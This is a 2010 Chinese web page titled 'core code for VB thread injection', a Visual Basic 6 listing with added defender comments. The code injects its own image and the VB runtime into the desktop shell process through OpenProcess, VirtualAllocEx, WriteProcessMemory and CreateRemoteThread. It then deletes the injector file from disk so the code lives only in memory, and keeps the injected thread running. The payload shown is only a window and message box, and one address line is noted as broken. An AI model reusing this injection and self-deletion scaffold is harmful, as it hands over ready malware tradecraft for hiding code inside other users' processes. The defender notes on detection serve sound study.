VB的线程注入核心代码
作者:未知 申领版权
2010年11月15日 共有 1348 次访问

    
    ' Win32 imports for this module.
    ' The first group (OpenProcess, VirtualAllocEx/VirtualFreeEx, CreateRemoteThread,
    ' Read/WriteProcessMemory, CopyMemory) is what lets the listing write into and
    ' start code in another process; the rest are ordinary window, message-loop,
    ' file and GDI helpers used by the code that runs inside the target.
    ' Defender note: this import set, and the call sequence Main builds from it,
    ' is the classic remote-thread injection pattern and the usual thing to key
    ' static signatures and API-telemetry (EDR/ETW) rules on.
    Option Explicit
    ' --- process handle, remote memory and remote thread creation ---
    Public Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
    Public Declare Function VirtualAllocEx Lib "kernel32" (ByVal ProcessHandle As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
    Public Declare Function VirtualFreeEx Lib "kernel32" (ByVal ProcessHandle As Long, lpAddress As Any, ByVal dwSize As Long, ByVal dwFreeType As Long) As Long
    ' Resolves the PID behind a window handle; used for target selection in Main.
    Public Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hwnd As Long, lpdwProcessId As Long) As Long
    Public Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
    Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As Any, ByVal lpWindowName As Any) As Long
    Public Declare Function CreateRemoteThread Lib "kernel32" (ByVal ProcessHandle As Long, lpThreadAttributes As Long, ByVal dwStackSize As Long, lpStartAddress As Long, lpParameter As Any, ByVal dwCreationFlags As Long, lpthreadid As Long) As Long
    Public Declare Function CreateThread Lib "kernel32" (ByVal lpThreadAttributes As Any, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Any, ByVal dwCreationFlags As Long, lpthreadid As Long) As Long
    Public Declare Function GetModuleHandleA Lib "kernel32" (ByVal ModName As Any) As Long
    Public Declare Function WriteProcessMemory Lib "kernel32" (ByVal ProcessHandle As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
    Public Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
    Public Declare Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long
    ' --- window, message-loop and UI helpers used by the injected code ---
    Public Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hwnd As Long, ByVal Msg As Any, ByVal wParam As Any, ByVal lParam As Any) As Long
    Public Declare Function MessageBox Lib "user32" Alias "MessageBoxA" (ByVal hwnd As Long, ByVal lpText As String, ByVal lpCaption As String, ByVal wType As Long) As Long
    ' Used by MainModule to remove the injector executable from disk after injection.
    Public Declare Function DeleteFile Lib "kernel32" Alias "DeleteFileA" (ByVal lpFileName As String) As Long
    Public Declare Function CreateEvent Lib "kernel32" Alias "CreateEventA" (ByVal lpEventAttributes As Long, ByVal bManualReset As Long, ByVal bInitialState As Long, ByVal lpname As String) As Long
    ' Fills szFileName with this executable's own path in Main.
    Public Declare Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As Integer, ByVal lpFileName As String, ByVal nSize As Integer) As Integer
    Public Declare Function GetCurrentProcessId Lib "kernel32" () As Long
    Public Declare Function GetMessage Lib "user32" Alias "GetMessageA" (lpMsg As Msg, ByVal hwnd As Long, ByVal wMsgFilterMin As Long, ByVal wMsgFilterMax As Long) As Long
    Public Declare Function TranslateMessage Lib "user32" (lpMsg As Msg) As Long
    Public Declare Function DispatchMessage Lib "user32" Alias "DispatchMessageA" (lpMsg As Msg) As Long
    Public Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long
    Public Declare Function LoadCursor Lib "user32" Alias "LoadCursorA" (ByVal hInstance As Long, ByVal lpCursorName As Any) As Long
    Public Declare Function LoadIcon Lib "user32" Alias "LoadIconA" (ByVal hInstance As Long, ByVal lpIconName As String) As Long
    Public Declare Function CreateFontIndirect Lib "gdi32" Alias "CreateFontIndirectA" (lpLogFont As LOGFONT) As Long
    Public Declare Function DestroyWindow Lib "user32" (ByVal hwnd As Long) As Long
    Public Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
    Public Declare Function CreateWindowEx Lib "user32" Alias "CreateWindowExA" (ByVal dwExStyle As Long, ByVal lpClassName As String, ByVal lpWindowName As String, ByVal dwStyle As Long, ByVal x As Long, ByVal y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hWndParent As Long, ByVal hMenu As Long, ByVal hInstance As Long, lpParam As Any) As Long
    Public Declare Function SetWindowText Lib "user32" Alias "SetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String) As Long
    Public Declare Function SetWindowLong Lib "user32" Alias "SetWindowLongA" (ByVal hwnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
    Public Declare Function RegisterClass Lib "user32" Alias "RegisterClassA" (Class As WNDCLASS) As Long
    Public Declare Function UnregisterClass Lib "user32" Alias "UnregisterClassA" (ByVal lpClassName As String, ByVal hInstance As Long) As Long
    Public Declare Function DefWindowProc Lib "user32" Alias "DefWindowProcA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
    ' --- file I/O and process helpers (most are declared but not called here) ---
    Public Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, ByVal lpSecurityAttributes As Long, ByVal dwCreationDisposition As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplateFile As Long) As Long
    Public Declare Function ReadFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Any, ByVal nNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, ByVal lpOverlapped As Long) As Long
    Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
    Public Declare Function WriteFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Any, ByVal nNumberOfBytesToWrite As Long, lpNumberOfBytesWritten As Long, ByVal lpOverlapped As Long) As Long
    Public Declare Function GetFileSize Lib "kernel32" (ByVal hFile As Long, lpFileSizeHigh As Long) As Long
    Public Declare Function GetLastError Lib "kernel32" () As Long
    Public Declare Sub Sleep Lib "kernel32" (ByVal time As Long)
    Public Declare Sub PostQuitMessage Lib "user32" (ByVal nExitCode As Long)
    Public Declare Sub ExitThread Lib "kernel32" (ByVal dwExitCode As Long)
    Public Declare Sub ExitProcess Lib "kernel32" (ByVal dwExitCode As Long)
    ' RtlMoveMemory used as a raw memcpy; Main reads PE headers through it.
    Public Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)
    
    ' Win32 structures referenced by the window/message declarations above.
    ' POINTAPI: x/y pair embedded in Msg.
    Public Type POINTAPI
    x As Long
    y As Long
    End Type
    ' MSG structure for GetMessage/TranslateMessage/DispatchMessage; no procedure in
    ' this listing actually runs such a loop (MainModule uses DoEvents instead).
    Public Type Msg
    hwnd As Long
    message As Long
    wParam As Long
    lParam As Long
    time As Long
    pt As POINTAPI
    End Type
    ' WNDCLASS for RegisterClass. MainModule fills only lpfnwndproc, hbrBackground
    ' and lpszClassName; the remaining fields stay at their zero defaults.
    Public Type WNDCLASS
    style As Long
    lpfnwndproc As Long
    cbClsextra As Long
    cbWndExtra2 As Long
    hInstance As Long
    hIcon As Long
    hCursor As Long
    hbrBackground As Long
    lpszMenuName As String
    lpszClassName As String
    End Type
    ' LOGFONT for CreateFontIndirect; declared but not used by any procedure here.
    Public Type LOGFONT
    lfHeight As Long
    lfWidth As Long
    lfEscapement As Long
    lfOrientation As Long
    lfWeight As Long
    lfItalic As Byte
    lfUnderline As Byte
    lfStrikeOut As Byte
    lfCharSet As Byte
    lfOutPrecision As Byte
    lfClipPrecision As Byte
    lfQuality As Byte
    lfPitchAndFamily As Byte
    lfFaceName(32) As Byte
    End Type
    
    ' Window-style, message, file and resource constants. Only WS_OVERLAPPEDWINDOW is
    ' referenced by a procedure in this listing (CreateWindowEx in MainModule); the
    ' others are a stock Win32 constant set carried along with the declarations.
    Public Const GWL_WNDPROC = (-4)
    Public Const WS_VISIBLE = &H10000000
    Public Const WS_CHILD = &H40000000
    Public Const WS_THICKFRAME = &H40000
    Public Const WS_TABSTOP = &H10000
    Public Const WS_BORDER = &H800000
    Public Const WS_OVERLAPPED = &H0&
    Public Const WS_CAPTION = &HC00000
    Public Const WS_SYSMENU = &H80000
    Public Const WS_MINIMIZEBOX = &H20000
    Public Const WS_MAXIMIZEBOX = &H10000
    Public Const WS_OVERLAPPEDWINDOW = (WS_OVERLAPPED Or WS_CAPTION Or WS_SYSMENU Or WS_THICKFRAME Or WS_MINIMIZEBOX Or WS_MAXIMIZEBOX)
    Public Const WS_EX_CLIENTEDGE = &H200&
    Public Const WS_EX_WINDOWEDGE = &H100&
    Public Const WS_EX_STATICEDGE = &H20000
    Public Const WM_SETTEXT = &HC
    Public Const WM_GETTEXTLENGTH = &HE
    Public Const WM_VSCROLL = &H115
    Public Const WM_KEYUP = &H101
    Public Const WM_LBUTTONUP = &H202
    ' WndProc compares against the literal &H201 rather than this constant.
    Public Const WM_LBUTTONDOWN = &H201
    Public Const WM_SHOWWINDOW = &H18
    Public Const WM_DESTROY = &H2
    Public Const WM_SETFONT = &H30
    Public Const WM_COPY = &H301
    Public Const WM_PASTE = &H302
    Public Const INVALID_HANDLE_VALUE = -1
    Public Const GENERIC_WRITE = &H40000000
    Public Const GENERIC_READ = &H80000000
    Public Const GENERIC_ALL = &H10000000
    Public Const FILE_ATTRIBUTE_NORMAL = &H80
    Public Const CREATE_NEW = 1
    Public Const CREATE_ALWAYS = 2
    Public Const OPEN_EXISTING = 3
    Public Const OPEN_ALWAYS = 4
    Public Const FILE_SHARE_READ = &H1
    Public Const FILE_SHARE_WRITE = &H2
    Public Const TRUNCATE_EXISTING = 5
    Public Const COLOR_WINDOW = 5
    Public Const IDC_ARROW = 32512&
    Public Const IDI_APPLICATION = 32512&
    Public Const SW_SHOWNORMAL = 1
    Public Const CW_USEDEFAULT = &H80000000
    ' gClassName/gAppName/ghWnd are defined but never referenced in this listing;
    ' MainModule uses the literal "HijackedClass" instead.
    Public Const gClassName = "CustomClName"
    Public Const gAppName = "Application caption"
    Public ghWnd As Long
    
    ' Memory-allocation and process-access flags used by Main for the remote copy.
    ' Defender note: PROCESS_ALL_ACCESS on a foreign process combined with an
    ' executable-and-writable (PAGE_EXECUTE_READWRITE) allocation there is a common
    ' hunting heuristic for injection, independent of the payload.
    Const MEM_COMMIT = &H1000
    Const MEM_RESERVE = &H2000
    Const MEM_RELEASE = &H8000
    Const PAGE_EXECUTE_READWRITE = &H40&
    ' Number of IMAGE_DATA_DIRECTORY entries in the optional header (identifier kept
    ' as published, including its misspelling).
    Const IMAGE_NUMBEROF_DIRECTIRY_ENRIES = 16
    Const STANDARD_RIGHTS_REQUIRED = &HF0000
    Const SYNCHRONIZE = &H100000
    Const PROCESS_ALL_ACCESS = (STANDARD_RIGHTS_REQUIRED Or SYNCHRONIZE Or &HFFF)
    
    ' Subset of the PE header structures, mirroring the Win32 layout so CopyMemory can
    ' read them straight out of a mapped image. Main reads only
    ' IMAGE_DOS_HEADER.e_lfanew (offset of the PE header) and
    ' IMAGE_OPTIONAL_HEADER32.SizeOfImage (size of the mapped image).
    Type IMAGE_DATA_DIRECTORY
    VirtualAddress As Long
    Size As Long
    End Type
    
    ' Only its size (Len) is used, to step past the file header to the optional header.
    Type IMAGE_FILE_HEADER
    Machine As Integer
    NumberOfSections As Integer
    TimeDataStamp As Long
    PointerToSymbolTable As Long
    NumberOfSymbols As Long
    SizeOfOptionalHeader As Integer
    Characteristics As Integer
    End Type
    
    ' Several field names carry typos from the source page (SizeOfInitalizedData,
    ' LoaerFlags); only field order and size matter for the CopyMemory reads.
    Type IMAGE_OPTIONAL_HEADER32
    Magic As Integer
    MajorLinkerVersion As Byte
    MinorLinkerVersion As Byte
    SizeOfCode As Long
    SizeOfInitalizedData As Long
    SizeOfUninitalizedData As Long
    AddressOfEntryPoint As Long
    BaseOfCode As Long
    BaseOfData As Long
    ImageBase As Long
    SectionAlignment As Long
    FileAlignment As Long
    MajorOperatingSystemVersion As Integer
    MinorOperatingSystemVersion As Integer
    MajorImageVersion As Integer
    MinorImageVersion As Integer
    MajorSubsystemVersion As Integer
    MinorSubsystemVersion As Integer
    Reserved1 As Long
    SizeOfImage As Long
    SizeOfHeaders As Long
    CheckSum As Long
    Subsystem As Integer
    DllCharacteristics As Integer
    SizeOfStackReserve As Long
    SizeOfStackCommit As Long
    SizeOfHeapReserve As Long
    SizeOfHeapCommit As Long
    LoaerFlags As Long
    NumberOfRvaAndSizes As Long
    DataDirectory(IMAGE_NUMBEROF_DIRECTIRY_ENRIES - 1) As IMAGE_DATA_DIRECTORY
    End Type
    
    ' Placeholder type; not referenced by any procedure in this listing.
    Type test
    sz黑吧 As String
    End Type
    
    ' DOS stub header; e_lfanew gives the offset of the PE signature. (e_onvo is the
    ' source page's spelling of e_ovno; layout is unaffected.)
    Type IMAGE_DOS_HEADER
    e_magic As Integer
    e_cblp As Integer
    e_cp As Integer
    e_crlc As Integer
    e_cparhdr As Integer
    e_minalloc As Integer
    e_maxalloc As Integer
    e_ss As Integer
    e_sp As Integer
    e_csum As Integer
    e_ip As Integer
    e_cs As Integer
    e_lfarlc As Integer
    e_onvo As Integer
    e_res(3) As Integer
    e_oemid As Integer
    e_oeminfo As Integer
    e_res2(9) As Integer
    e_lfanew As Long
    End Type
    ' Window class name Main uses to pick the target process: the desktop shell's
    ' Program Manager window, so on a normal desktop the target is the shell process.
    Const sz黑吧 As String = "ProgMan"
    ' Fixed-length buffer (261 = MAX_PATH + 1) for this executable's own path; filled
    ' in Main and copied into the target for MainModule to read back.
    Global szFileName As String * 261
    Public Sub Main()
    ' Injector entry point. Locates the process owning the "ProgMan" (desktop shell)
    ' window, copies this executable's in-memory image and the VB6 runtime image into
    ' that process at the same base addresses they have here, hands it the path of
    ' this executable, starts HijackModule there as a remote thread, then exits.
    ' Defender note: the chain below -- OpenProcess(PROCESS_ALL_ACCESS),
    ' VirtualAllocEx(PAGE_EXECUTE_READWRITE), WriteProcessMemory, CreateRemoteThread
    ' with a start address inside a freshly written region -- is the textbook
    ' remote-thread injection sequence that EDR/ETW rules and Sysmon Event 8
    ' (CreateRemoteThread) are built to surface. No return value is checked, so
    ' every failure along the way is silent.
    
    Dim PID As Long, ProcessHandle As Long
    Dim Size As Long, BytesWritten As Long, TID As Long, Module As Long, NewModule As Long
    Dim PImageOptionalHeader As IMAGE_OPTIONAL_HEADER32, PImageDosHeader As IMAGE_DOS_HEADER, TImageFileHeader As IMAGE_FILE_HEADER
    Dim ExeVariable As Long
    
    
    ' Path of this executable; later written into the target so the injected code
    ' knows which file to delete.
    GetModuleFileName 0, szFileName, 261
    
    
    ' Target selection: PID of the process that owns the desktop shell window.
    GetWindowThreadProcessId FindWindow(sz黑吧, 0&), PID
    
    
    ' Full-access handle to the target; never closed before ExitProcess.
    ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, 0, PID)
    
    
    ' Base address of this process's own executable image.
    Module = GetModuleHandleA(vbNullString)
    
    
    ' DOS header of our own image, to reach the PE header via e_lfanew.
    CopyMemory PImageDosHeader, ByVal Module, Len(PImageDosHeader)
    
    
    ' Optional header, to obtain SizeOfImage. (As transcribed on the source page this
    ' address expression is not valid VB syntax; left unchanged.)
    CopyMemory PImageOptionalHeader, ByVal (Module PImageDosHeader.e_lfanew 4 Len(TImageFileHeader)), Len(PImageOptionalHeader)
    
    
    ' Size of the whole mapped image, used for the remote copy.
    Size = PImageOptionalHeader.SizeOfImage
    
    
    ' Release whatever the target has at our image base so the same address can be
    ' re-allocated there; the copy relies on keeping that base rather than relocating.
    VirtualFreeEx ProcessHandle, Module, 0, MEM_RELEASE
    
    
    ' Executable-and-writable allocation in the target at our own image base.
    NewModule = VirtualAllocEx(ProcessHandle, Module, Size, MEM_RESERVE Or MEM_COMMIT, PAGE_EXECUTE_READWRITE)
    
    
    ' Raw byte copy of this process's mapped image into the target.
    WriteProcessMemory ProcessHandle, ByVal NewModule, ByVal Module, Size, BytesWritten
    
    
    ' Second small allocation holding this executable's path; its remote address is
    ' the parameter the remote thread receives.
    ExeVariable = VirtualAllocEx(ProcessHandle, 0, 261, MEM_RESERVE Or MEM_COMMIT, PAGE_EXECUTE_READWRITE)
    WriteProcessMemory ProcessHandle, ByVal ExeVariable, ByVal szFileName, 261, BytesWritten
    
    
    ' Same read-header/allocate/copy procedure for the VB6 runtime (msvbvm60.dll),
    ' which the copied image depends on being present at the same address.
    Dim VBMod As Long, VBSize As Long, VBNewMod As Long
    VBMod = GetModuleHandleA("msvbvm60.dll")
    CopyMemory PImageDosHeader, ByVal VBMod, Len(PImageDosHeader)
    CopyMemory PImageOptionalHeader, ByVal (VBMod PImageDosHeader.e_lfanew 4 Len(TImageFileHeader)), Len(PImageOptionalHeader)
    VBSize = PImageOptionalHeader.SizeOfImage
    VBNewMod = VirtualAllocEx(ProcessHandle, VBMod, VBSize, MEM_RESERVE Or MEM_COMMIT, PAGE_EXECUTE_READWRITE)
    WriteProcessMemory ProcessHandle, ByVal VBNewMod, ByVal VBMod, VBSize, BytesWritten
    
    
    ' Start HijackModule in the target with the path buffer as its argument, then
    ' exit; from here on the code exists only as the copy running inside the target.
    CreateRemoteThread ProcessHandle, ByVal 0, 0, ByVal GetAdd(AddressOf HijackModule), ByVal ExeVariable, 0, TID
    ExitProcess 0
    End Sub
    Private Function GetAdd(Entrypoint As Long) As Long
    GetAdd = Entrypoint
    End Function
    Private Function MainModule(Stuff As Long) As String
    ' Body of the injected code; runs on the remote thread inside the target.
    ' Stuff is the address of the 261-byte path buffer Main wrote into this process.
    ' Reads that path back, registers a window class whose procedure is WndProc,
    ' shows a window and a message box, deletes the file at that path, then spins
    ' forever so the thread (and with it the injected image) stays resident.
    ' Declared As String but never assigns a result and never returns.
    
    Dim BytesWritten As Long, wc As WNDCLASS, szExename As String * 261
    Dim lngFileHandle As Long, lngLength As Long, Exec As String, lBytesRead As Long, szTestName As String
    
    
    ' Copies the path buffer through a full-access handle to the current process;
    ' the handle is never closed.
    ReadProcessMemory OpenProcess(PROCESS_ALL_ACCESS, 0, GetCurrentProcessId), ByVal Stuff, ByVal szExename, 261, ByVal BytesWritten
    
    
    ' Minimal window class: procedure, background brush and name only.
    With wc
    .lpfnwndproc = GetAdd(AddressOf WndProc)
    .hbrBackground = 5
    .lpszClassName = "HijackedClass"
    End With
    RegisterClass wc
    
    
    ' Visible top-level window owned by the host process's own image
    ' (GetModuleHandleA(0&) is evaluated inside the target).
    ShowWindow CreateWindowEx(0, "HijackedClass", "Hijacked Form", WS_OVERLAPPEDWINDOW, 100, 100, 340, 240, 0, 0, GetModuleHandleA(0&), ByVal 0&), 1
    
    
    MessageBox 0, "Hijack Module Working", "Sucess!", 0
    
    
    ' Self-deletion: removes the injector executable from disk, so after this point
    ' the code exists only in the target's memory. Defender note: file-based AV will
    ' not find it afterwards; memory scanning, the earlier API telemetry and the
    ' file-delete event are the remaining evidence.
    DeleteFile szExename
    
    
    ' Keeps the thread alive; DoEvents lets the window's messages be processed.
    Do: DoEvents: Sleep 100: Loop
    End Function
    Public Function HijackModule(ByVal Stuff As Long) As Long
    ' Thread start routine Main passes to CreateRemoteThread. Stuff is the remote
    ' thread parameter (address of the path buffer). Delegates to MainModule, which
    ' loops forever, so the return value is never set.
    
    MainModule Stuff
    End Function
    Public Function WndProc(ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
    ' Window procedure for the "HijackedClass" window created in MainModule. On a
    ' left-button press (&H201, the value of WM_LBUTTONDOWN declared above) it shows
    ' a message box; every message is then handed to DefWindowProc.
    If wMsg = &H201 Then MessageBox 0, "提示A", "提示B", 0
    WndProc = DefWindowProc(hwnd, wMsg, wParam, lParam)
    End Function 
    

    

 
